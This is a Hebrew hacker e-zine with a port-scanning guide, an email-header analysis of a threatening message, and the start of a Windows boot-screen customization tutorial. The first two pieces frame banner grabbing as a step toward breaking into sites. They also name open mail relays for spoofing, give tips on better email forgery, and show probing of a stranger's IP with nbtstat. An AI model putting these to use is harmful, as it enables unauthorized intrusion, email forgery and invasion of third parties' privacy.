‫הערה ‪ :‬לא היה לי לב לבדוק אם זה עושה שיחות לחו"ל אתם מוזמנים לנסות‪.‬‬
‫הכתבה נכתבה ע"י ‪y0g1 b3ar‬‬

‫פורט סקנינג‬
‫‪++++++++++++++++++++++++++++++++++++++++++++++++++++++‬‬
‫‪(in loving memory of douglas adams (1952-2001‬‬
‫‪++++++++++++++++++++++++++++++++++++++++++++++++++++++‬‬
‫לכל אלה מכם ששואלים "מי זה לעזאזל דאגלאס אדאמס" אולי‬
‫"מדריך הטרמפיסט לגלקסיה" יזכיר לכם משהו‪ .‬ואם לא אז תתביישו‪ ,‬תתביישו‪,‬‬
‫תתביישו כי זה הדבר הכי מופרע‪ ,‬מצחיק‪ ,‬מגניב‪ ,‬מדליק‪ ,‬הכל שקיים בעולם‪,‬‬
‫ביקום ובכל השאר‪..‬‬
‫לא חשוב‪ .‬ראיתי כבר אנשים שהקדישו לאהובותיהם אקספלוייטים‪ ,‬מתמטיקאים‬
‫ופיזיקאים שהקדישו "באהבה רבה" את הספרים המגעילים שהם כתבו לנשותיהם‬
‫(אני מאוד מצטערת‪ ,‬אבל אם אני הייתי במקומן הם היו עפים מהבית כבר ממזמן)‪,‬‬
‫אז אני לא חושבת שזה מוזר להקדיש את הטקסט הזה לדאגלאס‪ .‬וי לאב יו‪.‬‬
‫טוב‪ ,‬אז בתפריט היום סקאנינג סקאנינג ועוד קצת סקאנינג (תנסו להגיד את זה רצוף)‬
‫כי בכל הטיולים שלי בפורום גיהנום ראיתי הרבה קוראים מסורים שלנו שהתעצבנו ‪-‬‬
‫למה לעזאזל אנחנו לא מלמדים אותם פורט סקנינג‪ .‬אז הנה זה בא‪.‬‬
‫תשבו‪ ,‬תיקחו כוס קולה (אורגינלית) ובואו איתי לעולם המופלא של הפורטים‪.‬‬
‫זה יכול להיות ארוך‪.‬‬
‫חלקכם אולי יודעים חלק מהדברים‪ ,‬אבל סטיק וויז מי‪ ,‬אתם תמיד יכולים ללמוד‬
‫משהו חדש‪.‬‬
‫אז מה זה פורט בכלל? נניח שאתם מתחברים לאינטרנט ופותחים את התיבת אימייל שלכם‪,‬‬
‫בוא נגיד אאוטלוק אקספרס‪ .‬חשבתם פעם מה קורה? המחשב שלכם בעצם מתחבר לאיזשהו‬
‫מקום על גבי השרת של האינטרנט שלכם‪ ,‬ובודק אם יש לכם דואל חדש‪ .‬המקום הזה נקרא‬
‫פורט‪ .‬הפורט של הבדיקת אימייל הוא ‪ ,110‬והפורט של השליחת אימייל הוא ‪.25‬‬
‫בואו ניקח עוד דוגמה‪ :‬אתם פותחים את הדפדפן ואומרים לו להיכנס‬
‫ל ‪ . www.foobar.com‬המחשב שלכם בעצם מתחבר לפורט ‪ 80‬על השרת ‪www.foobar.com‬‬
‫ומציג לכם את התוכן שיש בו‪.‬‬
‫כמו שאתם אולי יודעים‪ ,‬אפשר להתחבר לפורטים ישירות דרך טלנט‪.‬‬
‫זאת אומרת‪ ,‬במקום להגיד לדפדפן שלכם ללכת לאתר ‪, www.foobar.com‬‬
‫אתם לוקחים את הטלנט שלכם ל ‪ www.foobar.com‬פורט ‪.80‬‬
‫אהה‪ ,‬אני רואה את הקוצים מתחילים לצמוח לכם בתחת‪ ,‬אבל מה יצא לנו מזה?‬
‫אם אתם רוצים לפרוץ משהו על הרשת‪ ,‬אתם צריכים קודם אינפורמציה‪.‬‬
‫אתם צריכים לדעת קודם כל‪ ,‬איזה מערכת השרת מריץ‪ ,‬וכל מיני תוכניות שהוא מריץ‪.‬‬
‫ככה אתם רואים איזה חורי אבטחה יש באתר ואיך אתם יכולים לחדור אליו‪.‬‬
‫בואו נעשה ניסיון קטן‪.‬‬
‫תפתחו את טלנט (התחל< חפש< קבצים או תיקיות< ‪ - telnet‬על כונן ‪)c‬‬
‫ותתחברו נניח ל ‪ gehenom.cjb.net‬פורט ‪.80‬‬
‫עכשיו בעצם אתם פותחים את האתר מהטלנט‪ .‬תנסו להקליד משהו‪.‬‬
‫תקבלו הודעת שגיאה כזאת‪:‬‬
‫>!‪<"doctype html public "-//ietf//dtd html 2.0//en‬‬
‫ואז השרת יגיד לכם שהפקודה שהקלדתם לא חוקית‪.‬‬
‫מכאן אנחנו רק יודעים את הגרסה של ה ‪ html‬שהאתר משתמש בה‪,‬‬
‫אז זה לא הכי מועיל לנו‪ .‬אבל יש מקרים שפורט ‪ 80‬מוסר אינפורמציה אחרת‪...‬‬
‫אני אקח כדוגמה אתר שניסיתי אבל בגלל שיש בו מלא חורי אבטחה אני לא רוצה‬
‫שתזיקו לו (אני רוצה להזיק לו לבד ‪ ,) ):‬אז אני אזייף את הכתובת שלו‪.‬‬
‫התחברתי ל ‪( www.foo.org.il‬כתובת מזויפת) פורט ‪ .80‬הקלדתי סתם משהו ואז‬
‫קיבלתי חזרה הודעת שגיאה בסגנון‪:‬‬

‫‪microsoft iis 4.0 : command not recognized‬‬
‫הו‪-‬פה! הפורט מודיע לי חגיגית שהאתר מריץ ‪ ms iis‬שזו תוכנה של מייקרוסופט‬
‫לניהול ואחזקת אתרים‪ .‬ויש כלל בעולם ההאקינג‪ :‬אם זה מייקרוסופט‪ ,‬שום דבר לא‬
‫בטוח‪ .‬בדברים של מייקרוסופט יש מיליוני חורי אבטחה‪ .‬אם אתם מוצאים אתר‬
‫שמריץ ‪ iis‬לדוגמה‪ ,‬לכו לחפש אקספלוייטים של ‪ iis‬ותגלו שלא קשה לפרוץ אותו‪.‬‬
‫על אותו אתר‪ ,‬לקחתי את טלנט לפורט ‪ .21‬זהו הפורט של ה ‪ ftp‬שזה שרת קבצים‬
‫שמאפשר לכם להיכנס ולהוריד ולהעלות (רק אם יש לכם ‪ account‬שם) קבצים לשרת‪.‬‬
‫טלנט מודיעה לי‪ microsoft ftp :‬ואין מאושרת ממני‪ .‬בשביל ימים כאלה כיף‬
‫לקום בבוקר‪): .‬‬
‫אבל נעזוב את זה עכשיו‪ ,‬כי רק על ‪ iis‬ו ‪ ftp‬אפשר לכתוב מדריך שלם‪.‬‬
‫טלנטו לפורט ‪ 21‬על ‪ .netvision.net.il‬יפתח לכם שרת ה ‪.ftp‬‬
‫הקלידו ‪user anonymous‬‬
‫השרת יגיד משהו בסגנון "אוקי‪ ,‬רק תנו לי את האימייל שלכם בתור סיסמה"‬
‫‪pass fuck@you.com‬‬
‫ותקבלו משהו בסגנון‪user logged in :‬‬
‫כמעט על כל שרת ‪ ftp‬יש חשבון (‪ )account‬בשם אנונימוס שנותן לכם להיכנס ללא‬
‫צורך בסיסמה‪ .‬ברוב המקרים זה לא הכי יעזור לכם לפרוץ את השרת אבל לפחות אתם‬
‫יכולים להסתכל על כמה ספריות שם ולהוריד קבצים במקרים טובים‪ .‬אבל יש גם מקרים‬
‫אחרים‪ ...‬שוב‪ ,‬זה לא טקסט על ‪ ftp‬אז אני לא אפרט‪ .‬תבקשו‪ ,‬אני מבטיחה לכתוב על‬
‫זה משהו‪.‬‬
‫התנתקו מהפורט באלגנטיות (‪ ctrl+f4‬או ‪.)quit‬‬
‫התחברו לפורט ‪ 25‬על‪ ,‬נניח ‪( out.inter.net.il‬אינטרנט זהב)‪ .‬בדקו את השטח‪.‬‬
‫תסתכלו קצת מסביב‪ .‬תפסתם ת'ראש? יופי‪.‬‬
‫עכשיו בחרו לכם אתר משלכם‪ .‬תחקרו אותו‪ ,‬תשיגו עליו את כל האינפורמציה שאתם‬
‫יכולים‪ .‬תבדקו פורטים חשובים כמו‪:‬‬
‫‪ftp - 21‬‬
‫‪ telnet - 23‬אם הפורט הזה פתוח‪,‬‬
‫זה אומר שהשרת נותן למשתמשים שלו ‪.shell account‬‬
‫זה חשבון שנותן למשתמש להריץ פקודות יוניקס על השרת‪,‬‬
‫כאילו המשתמש נמצא ממש מול מערכת יוניקס‪.‬‬
‫אם הספק אינטרנט שלכם פותח את הפורט הזה‪,‬‬
‫נסו להתחבר ולהקליד את שם המשתמש והסיסמה שלכם‪,‬‬
‫ואתם יכולים להריץ כמה פקודות יוניקס חמודות כמו ‪.whois‬‬
‫חבל‪ ,‬אבל כל ספקי האינטרנט בישראל שאני יודעת עליהם חסמו את הפורט הזה‪.‬‬
‫‪ - 25‬כתיבת אימייל‬
‫‪ finger - 79‬זה פורט שאם הוא פתוח‪ ,‬אתם יכולים להיות מאושרים‪ .‬מאוד מאושרים‪.‬‬
‫דרך הפורט הזה אפשר להשיג אינפורמציה על משתמשים על הספק‪.‬‬
‫נסו להקליד ‪ finger root‬או אפילו סתם ‪ root‬לדוגמה‪,‬‬
‫כדי לקבל טינפו על המשתמש ‪.root‬‬
‫לפעמים אתם תוכלו לראות גם איזה משתמשים מחוברים כרגע על השרת ‪.‬‬
‫רגע‪ ,‬אם התוכנית הנחמדה ‪ finger‬יכולה להגיד לנו כלמיני דברים על כלמיני‬
‫משתמשים זה אומר שהיא יכולה לגשת לחשבונות (‪ )accounts‬של אותם משתמשים!‬
‫וזה אומר שיש לה גם גישה למשתמש העל‪ !!)root( ..‬לפעמים אם מקלידים משהו מוזר‬
‫בפורט הזה לדוגמה ‪ sjjh\\\\||###$^%$^$^%$‬התוכנית יכולה להשתגע ו"להפיל"‬
‫אתכם ישר לתוך החשבון של ה ‪ ...root‬אבל אל תתלהבו‪ ,‬זה מאוד מאוד נדיר‪.‬‬
‫וגם רוב השרתים חוסמים את הפורט הזה כי הוא מאוד עוזר לנו‪): ...‬‬
‫‪ .http - 80‬יענתו אתרים‪ ,‬נו‪ ,‬אתם יודעים‪.‬‬
‫‪ - 110‬קריאת אימייל‪.‬‬
‫‪ - 139‬שיתוף! ייאה!‬
‫את הרשימה השלמה של הפורטים הידועים תוכלו להשיג ב ‪rfc 1700‬‬

‫(פשוט חפשו אותו) או בכל מיני מסמכים (חפשו ‪ port list‬או משהו כזה)‪.‬‬
‫פורטים ידועים הם מ‪ 1-‬עד ‪ 1024‬אם אני זוכרת נכון‪ .‬אלה פורטים סטנדרטיים‪,‬‬
‫זאת אומרת שעל כל שרת פורט ‪ 25‬משמש לאימייל‪ ,‬פורט ‪ 80‬לאתר וכדומה‪.‬‬
‫פורטים מעל הערך הזה הם פורטים מוזרים יותר‪): .‬‬
‫אם אתם רוצים לראות איזה פורטים פתוחים תורידו פורט סקאנר‬
‫(או תבנו לבד‪ ,‬זה לקח לי בדיוק ‪ 5‬דקות) ותריצו סריקה‪ .‬הסקאנר יחזיר לכם את‬
‫מספרי הפורטים הפתוחים‪ .‬בכל זאת‪ ,‬עדיף גם לסרוק ידנית כי ככה אתם משיגים‬
‫יותר אינפו‪.‬‬
‫כשאתם מצליחים להתחבר לפורט מסויים‪ ,‬שימו לב לאיך שהוא מקבל אתכם‪.‬‬
‫בד"כ הוא יכתוב את השם של השרת או התוכנה שהוא מריץ או‬
‫כלמיני פרטים אחרים עליו‪ .‬ככה תדעו איך לפרוץ אותו‪.‬‬
‫אל תזלזלו בהודעות שגיאה‪ .‬הן יכולות לתת הרבה מאוד‪ .‬תקראו אותן‪.‬‬
‫דבר ראשון כשאתם מצליחים להתחבר לפורט‪ :‬נסו לקבל עזרה‪.‬‬
‫הקלידו ‪ .help‬אם זה לא עוזר תנסו ? או ‪ . man‬פורטים גבוהים יותר או כאלה שיש‬
‫להם הרבה בעיות מגינים על עצמם בזה שהם לא מסכימים לתת עזרה‪ .‬וזה די מעצבן‪.‬‬
‫הערה‪ :‬כשאתם מתחברים לפורט‪ ,‬השרת מריץ ‪ daemon‬שזאת תוכנה שמאזינה לאותו פורט‬
‫ומגיבה לקלט מסויים ממכם‪ .‬סתם לידע כללי‪ ,‬אם תתקלו במושג הזה‪.‬‬
‫טיפ אחרון‪ :‬רוצים לראות איזה פורטים פתוחים אצלכם? פתחו את חלון דוס (‪,)ms dos‬‬
‫והקלידו‪:‬‬
‫‪netstat -a‬‬
‫ככה תראו את כל השרתים שאתם מחוברים אליהם‪ ,‬שליד כל אתר כתוב הפורט שאליו‬
‫אתם מחוברים‪ .‬מן הסתם תראו שם גם את ספק האינטרנט שלכם ואתרים שאתם מחוברים‬
‫אליהם באותו הרגע‪.‬‬
‫וגם אנשים שאתם מדברים אייתם באייסיקיו או במירק באותו הרגע‪ ): .‬הא הא‪.‬‬
‫אם כתוב ליד הפורט ‪ established‬זה אומר שהפורט פתוח על השרת ומחכה לפקודות‬
‫ממכם (נניח אתר שמחכה לקלט ממכם) ואם כתוב ‪ listening‬הפורט פתוח אצלכם ומאזין‬
‫למשהו‪ .‬כמו למשתמש אייסיקיו אחר שאתם מדברים אייתו באותו רגע‪.‬‬
‫אה‪ ,‬ואם אתם רואים שפורט ‪ 31337‬פתוח אצלכם אז אכלתם אותה‪,‬‬
‫יש עליכם טרויאני (‪)))): .)back orifice‬‬
‫יש הרבה נושאים כאן כמו פקודות ‪ ftp‬ודוס שלא פירטתי עליהם כי אני לא רוצה‬
‫להתיש אתכם לגמרי וגם כי אני כבר די מותשת‪ .‬יאללה נמאס לי‬
‫‪have fun‬‬
‫‪i love you‬‬
‫‪always‬‬
‫שלכם‬
‫‪blood runner‬‬

‫הבנת כותרות ‪e-mail‬‬
‫"‪"all in all is all we are‬‬
‫(‪)kurt cobain‬‬
‫שיעור שני באינפורמציה בגיליון‪ :‬היום נלמד על‬
‫כותרות אימייל ואיך להשיג מידע דרכן‪ ,‬וגם נשחק קצת עם כל מיני מחשבים בדרך‪.‬‬
‫טוב‪ ,‬הסיפור הוא כזה‪:‬‬
‫יום העצמאות‪ ,‬היה לי ערב מעצבן ולא כייפי אז מסטלתי את עצמי עם מוזיקה‪.‬‬
‫אני חוזרת מ"סוטול" של ‪ 2‬אלבומים של מרילין מנסון (תאמינו לי זה יכול להקפיא‬
‫את המוח לבנאדם הכי שפוי‪ ,)..‬מתחברת לאינטרנט‪ ,‬בודקת אימייל‪ ,‬ובום חוזרת‬
‫למציאות במכה‪:‬‬
‫‪from: 1@walla.co.il‬‬
‫‪subject: icq email message‬‬
‫‪date: april 6, 2000 12:03:22 pm edt‬‬
‫אתר גיהינום אתר מדליק אך כאשר אחד ממכם מפרסם חשבונות‬
‫בנקים של אחרים זה מבחיל ועובר את כל גבול הטעם הטוב!‬
‫התביישו לכם‪ ,‬מי אתם?‬
‫מי אתם שתפרסמו חשבונות בנקים‪ ,‬הבעיה שלכם שאתם לא ועמלים בשביל הכסף‪.‬‬
‫אין לכם ערך לכסף!!!‬
‫עוד מסמך כזה יפורסם הוא יעבור למשטרה‬
‫ודבר נוסף אם חשבון שאיכשהו קרוב אלי‬
‫אני אדאג שאתרכם יהופך שמיים וארץ!‬
‫דמכם בראשכם‪ ,‬יש לנו קשרים‬
‫ואישית אם ניתפס אחד מכם אם לא תורידו מסמך זה יפגע קשות‬
‫אתם עכשיו לא בטוחים‪ ,‬אתם עוסקים באש!!!‬
‫‪---------------------------------‬‬‫‪download icq at http://www.icq.com‬‬
‫ת'אמת? די נבהלתי בהתחלה‪ .‬אבל אח"כ חטפתי קריזה ‪ -‬מה זה האיומים האלה?‬
‫תראו‪ ,‬גם אני נגד לפרסם חשבונות בנקים‪ ,‬אבל לאיים ככה על בחורה תמימה וצדיקה‬
‫כמוני?!?!‬
‫אוקי‪ ..‬מה עכשיו? מן הסתם זה אימייל מזויף‪ .‬בואו נראה מה אנחנו יכולים לגלות‬
‫עליו‪ .‬בשביל זה אנחנו צריכים לראות את כל הכותרת (‪ )header‬של האימייל‪.‬‬
‫באימייל‪.‬קום עושים את זה ע"י זה שלוחצים על הלינק‪:‬‬
‫‪show all headers‬‬
‫באאטלוק אקספרס לדוגמה‪ ,‬עושים את זה ע"י לחיצה ימנית על ההודעה ואז בחירה‬
‫ב"מאפיינים"‪ ,‬כרטיסיית "פרטים"‪.‬‬
‫ב ‪ eudora‬רואים את כל הכותרת ע"י לחיצה על הכפתור "‪): ."blah blah blah‬‬
‫אז מכיוון שקראתי את ההודעה דרך אימייל‪.‬קום לחצתי על הלינק וזה מה שקיבלתי‪:‬‬
‫| ‪show all headers‬‬
‫‪subject: icq email message‬‬
‫‪date: april 6, 2000 12:03:22 pm edt‬‬
‫‪to: zarquon@email.com add to address book‬‬
‫‪:cc‬‬
‫‪<return-path <1@walla.co.il‬‬

received from smv347-ec.mail.com by ida437-ec.mail.com )version 1.11( for
)<zarquon@email.com>; tue, 24 apr 2001 08:17:27 -0400 )edt
received from mailgw2.netvision.net.il )mailgw2.netvision.net.il [194.90.1.9]( by smv347ec.mail.com )8.9.3/8.9.1smv070400( with esmtp id iaa16497 for <zarquon@email.com>
)sent by <1@walla.co.il>; tue, 24 apr 2001 08:17:26 -0400 )edt
received from walla.co.il )ras4-p2.jlm.netvision.net.il [62.0.147.2]( by
mailgw2.netvision.net.il )8.9.3/8.9.3( with smtp id paa26992 for <zarquon@email.com>;
)tue, 24 apr 2001 15:19:01 +0300 )idt
<message-id <200104241219.paa26992@mailgw2.netvision.net.il
mime-version 1.0
"content-type text/plain; charset="iso-8859-1
content-transfer-encoding base64
x-mime-autoconverted from 8bit to base64 by smv347-ec.mail.com id iaa16497
x-delivery mail.com ida 1.11
...‫אווו מה כל השטויות האלה? בוא נבדוק שורה שורה‬
received from smv347-ec.mail.com by ida437-ec.mail.com )version 1.11( for
)<zarquon@email.com>; tue, 24 apr 2001 08:17:27 -0400 )edt
‫ קיבל את האימייל משרת‬smv347-ec.mail.com ‫זה אומר ששרת אימייל בשם‬
,mail.com ‫ שניהם נמצאים על‬,‫ שימו לב‬. ida437-ec.mail.com ‫בשם‬
‫ השערה שלי? אלה השרתים‬.‫או במילים אחרות שניהם נמצאים על אותה רשת‬
‫קום ולכן הם לא כ"כ מעניינים אותנו כי אנחנו רוצים לדעת מאיפה‬.‫של אימייל‬
.‫האימייל הגיע‬
.)version 1.11( ‫שימו לב שמצוין גם התאריך והגרסה של השרת‬
25 ‫ שבטח יש מלא חורי אבטחה על פורט‬,‫ שזה אומר‬...‫?? זה בטח גרסה ישנה‬1.11 ‫רק‬
.‫! אבל נעזוב את זה כרגע‬ida437-ec.mail.com ‫של‬
received from mailgw2.netvision.net.il )mailgw2.netvision.net.il [194.90.1.9]( by smv347ec.mail.com )8.9.3/8.9.1smv070400( with esmtp id iaa16497 for <zarquon@email.com>
)sent by <1@walla.co.il>; tue, 24 apr 2001 08:17:26 -0400 )edt
‫קום‬.‫ שלח את האימייל לשרת אימייל‬mailgw2.netvision.net.il ‫זה אומר לנו ששרת בשם‬
‫ כמו שאתם רואים מצוינת הגרסה‬.)smv347-ec.mail.com(
‫) וגם העובדה שהוא‬8.9.3/8.9.1smv070400( ‫שהשרת מריץ‬
.estmp ‫משתמש בפרוטוקול אימייל‬
id )iaa16497( - ‫האי יפי בסוגריים הוא האי יפי של שרת האימייל וה‬
.‫זה מספר זהות שניתן לכל אימייל שנשלח‬
. mailgw2.netvision.net.il ‫אני מתחילה לשער שהאימייל נשלח במקור דרך השרת‬
:‫בואו נבדוק את השורה הבאה‬
received from walla.co.il )ras4-p2.jlm.netvision.net.il [62.0.147.2]( by
mailgw2.netvision.net.il )8.9.3/8.9.3( with smtp id paa26992 for <zarquon@email.com>;
)tue, 24 apr 2001 15:19:01 +0300 )idt
<message-id <200104241219.paa26992@mailgw2.netvision.net.il
‫ הוא זה‬walla.co.il ‫ נראה כאילו‬,‫אווווווו! תראו מה יש לנו פה!! במבט ראשון‬
:‫ל בסוגריים כתובה הכתובת האמיתית ממנה נשלח האימייל‬-‫ב‬-‫ א‬..‫ששלח את האימייל‬
ras4-p2.jlm.netvision.net.il
[62.0.147.2]
!!!
‫שימו לב שבאמייל אמיתי לא יגידו לכם שהאימייל התקבל משרת אחד אבל יכתבו‬

‫בסוגריים כתובת אחרת‪...‬‬
‫מישהו מהאי יפי הזה שלח אימייל דרך ‪ mailgw2.netvision.net.il‬אלי‪.‬‬
‫מישהו מסביבות ירושלים‪ ,‬כי כתוב ‪.jlm‬‬
‫והנה הדבר הכי חשוב פה‪:‬‬
‫‪<message-id <200104241219.paa26992@mailgw2.netvision.net.il‬‬
‫לכל אימייל שנשלח דרך שרת כלשהוא (במקרה שלנו ‪)mailgw2.netvision.net.il‬‬
‫יש מספר זהות מיוחד (‪ .)id‬ככה המנהל יכול לבדוק בדיוק מי שלח‪ ,‬לאן וכולי‪.‬‬
‫הספרות שלפני הנקודה מציינות תאריך‪ .200104241219 :‬שזה אומר ‪24/04/2001‬‬
‫בשעה ‪.12:19‬‬
‫הספרות שאחרי הנקודה הן מספר הזהות המיוחד של האימייל‪.‬‬
‫רגע! כתוב פה שזה נשלח ב‪ 24‬באפריל! אבל באימייל עצמו היה כתוב ה‪ 6-‬באפריל!‬
‫ולא רק זה‪ ,‬גיליון ‪ 5‬יצא רק ב‪ 20‬ומשהו באפריל‪ .‬הנה עוד הוכחה שהאימייל מזויף‪.‬‬
‫ולא רק זה‪ ,‬אלא גם התאריך מזויף‪ .‬למה שמישהו ירצה לזייף תאריך?‬
‫אל תשאלו אותי‪...‬‬
‫בכל זאת‪ ,‬עדיין היו לי ספקות‪ ,‬ולכן החלטתי לוודא שהוא באמת מזויף‪.‬‬
‫לפי הכותרת אנחנו יודעים שהוא נשלח מנטוויז'ן ‪,mailgw2.netvision.net.il -‬‬
‫אבל כתוב שהוא נשלח מ‪ .walla.co.il‬אז הלכתי לאתר של נטוויז'ן וראיתי שהם‬
‫ממליצים על מנוע החיפוש נענע שהוא למיטב ידיעתי המתחרה של וואלה ולכן לא‬
‫הגיוני שואללה יושבים על נטוויז'ן‪ .‬סתם בשביל הכיף נכנסתי גם לואללה‪ ,‬פתחתי‬
‫חלון דוס והקלדתי‪:‬‬
‫‪tracert www.walla.co.il‬‬
‫וזה מה שקיבלתי‪...‬‬
‫[‪1‬‬
‫[‪2‬‬
‫‪3‬‬
‫‪4‬‬
‫‪5‬‬
‫‪6.‬‬
‫‪7.‬‬
‫‪8‬‬

‫‪ms 261 ms 275 ms diup-202-6.inter.net.il [213.8.202.6 257‬‬
‫‪ms 261 ms 275 ms diup-202-1.inter.net.il [213.8.202.1 253‬‬
‫‪ms 392 ms 327 ms 213.8.8.153 266‬‬
‫‪ms 273 ms 261 ms 192.116.202.158 267‬‬
‫‪ms 274 ms 274 ms 192.117.159.22 252‬‬
‫* ‪request timed out‬‬
‫*‬
‫*‬
‫* ‪request timed out‬‬
‫*‬
‫*‬

‫הפקודה ‪ tracert‬בודקת באיזה נתיבים עובר המידע שנשלח לואללה‪ ,‬זאת אומרת דרך‬
‫איזה מחשבים‪ .‬שתי השורות הראשונות קשורות למחשב שלי (אינטרנט זהב)‪.‬‬
‫לא מצאתי שם שום דבר שקשור איכשהוא לנטוויז'ן‪ .‬סתם בשביל ידע כללי‪,‬‬
‫שימו לב שהמידע עובר דרך עוד ‪ 2‬מחשבים שנמצאים על אינטרנט זהב ‪ -‬מכיוון ששני‬
‫איי‪-‬פיים מתחילים ב‪ .213.8.202 -‬אחד מהם הוא מן הסתם האייפי שלי אז זה אומר‬
‫שעוד מחשב על אינטרנט זהב מקבל את הנתונים לפני שהוא שולח לי‪ .‬עוד השערה ‪-‬‬
‫וואלה נמצא על שרת נפרד‪ ,‬לא קשור לשום דבר ובטח שלא לנטוויז'ן‪.‬‬
‫טוב‪ ,‬אז מה עושים?‬
‫יש לנו את הכתובת שממנה האימייל נשלח‪ .‬א‪-‬ב‪-‬ל אחרי בירור קצר גיליתי שנטויז'ן‬
‫לא נותנות אייפיים סטטיים (זאת אומרת אייפיים קבועים‪ ,‬כמו שיש לאתרים)‪ ,‬ואז‬
‫כל פעם שמתחברים מקבלים אייפי אחר‪.‬‬
‫אז כמו שאמרתי לכם‪ ,‬על כל שרת מייל כמעט יש רישום של הודעות שנשלחו מאותו שרת‪.‬‬
‫המנהל של השרת יכול לבדוק ולדעת בדיוק מי שלח מאיפה וכולי‪.‬‬
‫שלחתי אימייל ל‪ abuse@netvision.net.il‬וביקשתי מהם שיתנו לי את כתובת האימייל‬
‫האמיתית של מי ששלח בתאריך ‪ 24.4.2001‬מהאייפי ‪ 62.0.147.2‬הודעה עם מספר‬
‫זהות ‪ .paa26992‬הם ענו שבלי צו של בית משפט הם לא יכולים למסור לי שום פרטים‬
‫על חשבונות של אנשים‪(: .‬‬
‫טוב‪ ...‬מנהל נטויזן הוא היחיד שיכול לברר לי מי זה (האלטרנטיבה היא לפרוץ‬
‫לנטוויז'ן‪ )...‬אז אין מה לעשות‪ .‬אני רק רציתי להתנצל על זה שפירסמנו חשבונות‬

‫בנק‪): ...‬‬
‫סתם בשביל הכיף‪ ,‬טלנטתי ל ‪ mailgw2.netvision.net.il‬ול ‪smv347-ec.mail.com -‬‬
‫פורט ‪ .25‬השרת לא מבקש פקודת זיהוי ‪ !helo‬זה מקל על הזיוף‪.‬‬
‫שרתים די נחמדים האמת‪ ,‬והדבר הכי טוב בהם ‪ -‬הם נותנים לזייף מכל דומיין ניים‬
‫ולכל דומיין ניים‪( .‬יש כאלה שנותנים לזייף רק לכתובות של הדומיין ניימים שלהם)‪.‬‬
‫ניסיתי גם לבדוק מי זה ‪ 62.0.147.2‬שהיה מחובר באותו רגע‬
‫(גיליתי את זה ע"י הפקודה ‪ .)ping‬חקרתי קצת באמצעות ‪ netstat‬ו ‪ nbtstat‬וגיליתי‬
‫מחשב חמוד בשם "ישראל"‪ ,‬שימו לב לזה‪:‬‬
‫‪zero cool c:\windows>nbtstat -a 62.0.147.2‬‬
‫‪netbios remote machine name table‬‬
‫‪name‬‬
‫‪type‬‬
‫‪status‬‬
‫‪--------------------------------------------‬‬‫‪israel‬‬
‫‪<00> unique registered‬‬
‫‪none‬‬
‫‪<00> group‬‬
‫‪registered‬‬
‫‪israel‬‬
‫‪<03> unique registered‬‬
‫‪mac address = 44-45-53-54-00-00‬‬
‫‪54-00-00‬‬
‫איזה יופי‪ ..‬שיתופים‪ ..‬טוב ממילא זה לא המחשב שרציתי‪.‬‬
‫אז מה כן יצא לנו מהטקסט המבולגן הזה??‬
‫למדנו איך לאתר מקור של אימייל‪ .‬לדעת מאיפה הוא נשלח‪ ,‬האם הוא מזויף וקצת‬
‫פרטים על השולח (אנחנו יודעים שהוא מירושלים‪ ..‬יש‪.)..‬‬
‫שימו לב שאם האייפי ממנו נשלח האימייל היה סטטי היינו יכולים לברר המון‬
‫פרטים על המחשב השולח ואולי גם לפרוץ לשם‪.‬‬
‫למדנו גם לשים לב לגרסאות תוכנה‪ .‬גרסאות ישנות מאוד יכולות להכיל דברים‬
‫מעניינים מאוד לפעמים‪.‬‬
‫למדנו על מספרי זהות של אימיילים‪ ,‬וכן‪ ,‬למדנו שכשאנחנו מזייפים אימייל‬
‫אפשר לעלות עלינו בקלות‪ .‬אם אתם רוצים לזייף טוב‪ ,‬נסו שרתים שונים ובדקו‬
‫את הכותרות כדי לראות מה הכי טוב‪.‬‬
‫הכרנו את הפקודה ‪ tracert‬שתשמש אותנו הרבה כדי לעקוב אחרי העברת מידע‬
‫בין מחשבים‪.‬‬
‫מצאנו שני שרתי אימייל חביבים שיזייפו לנו כל מה שנרצה בחינם וגם מחשב‬
‫בודד בשם ישראל שזקוק לאימוץ‪.‬‬
‫טוב‪ ,‬אז לי היה כיף למרות שלא יצא מזה כלום‪ ,‬לכם היה מעניין אני מקווה‪,‬‬
‫וגם אם לא לפחות למדתם משהו חדש‪.‬‬
‫ביי‪,‬‬
‫"להתראות‪ ,‬שלום‬
‫זה לא נגמר‪ ,‬זה רק הסוף"‬
‫אוהבת תמיד‪,‬‬
‫‪blood runner‬‬

‫החלפת מסכי הפעלה‪/‬כיבוי‬
‫"בנאדם לא נולד אהבל‪ ,‬הוא גודל להיות כזה במסגרות ומוסדות כמו של מערכת החינוך בישראל‪".‬‬
‫(גיהנום)‬
‫(*)(*)‬
‫) (‬
‫( )‬
‫נחשו מי או מה אני??‬
‫שלא כמו במערכת לינוקס‪ ,‬מערכת ההפעלה ווינדוס אינה נותנת למשתמש שליטה מלאה‪ ,‬אלא להיפך‪.‬‬
‫אז אולי אתם יכולים להחליף את תמונת הרקע בשולחן העבודה‪ ,‬ולבחור איזה שמות לתת לקבצים‬
‫אבל‬
‫בסופו של דבר כוח השליטה שלכם על מערכת ההפעלה שמותקנת אצלכם במחשב‪ ,‬אפסית‪ .‬היום כל‬
‫זה יישתנה??‬
‫לא‪ .‬אבל אני אלמד אתכם משהו חמוד‪ .‬אצל רובכם‪ ,‬כשאתם מדליקים את המחשב‪ ,‬יש את סמל‬
‫החלונות של ווינדוס‬
‫ומאחוריו רקע כחול‪ .‬למטה כתוב‪:‬‬
‫‪microsoft windows 98‬‬
‫או‬
‫‪microsoft windows 95‬‬
‫חוץ מזה‪ ,‬כשאתם מכבים את המחשב‪ ,‬אז לרובכם המסך שחור‪ ,‬וכתוב משהו כמו‪:‬‬
‫'כעת ניתן לכבות את המחשב' בצבע כתום‪ .‬אני מקווה מאוד שאתם יודעים למה אני מתכוון‪ .‬בכל‬
‫מקרה‪,‬‬
‫לא משנה איך נראים אצלכם מסכי ההפעלה‪/‬כיבוי‪ ,‬היום אתם עומדים לשנות אותם (אם אתם רוצים)‬
‫לאיך‬
‫שאתם רוצים שהם ייראו‪ .‬פיתחו את עורך הגרפיקה האהוב עליכם‪ .‬לא משנה אם זה ‪,paint shot pro‬‬
‫או ‪ photoshop‬או כל דבר אחר‪ .‬אם אתם לא יודעים מה זה עורך גרפיקה או חושבים שאין לכם‪,‬‬
‫תיאלצו‬
‫להשתמש באחד פשוט שמגיע יחד עם מערכת הווינדוס שלכם‪ ,‬הרי זו תוכנת ‪.ms paint‬‬
‫בכדי להפעיל אותה לחצו על התחל ‪ <-‬הפעלה‪...‬‬
‫בחלון שנפתח הקלידו‪:‬‬
‫‪c:\program files\accessories\mspaint.exe‬‬
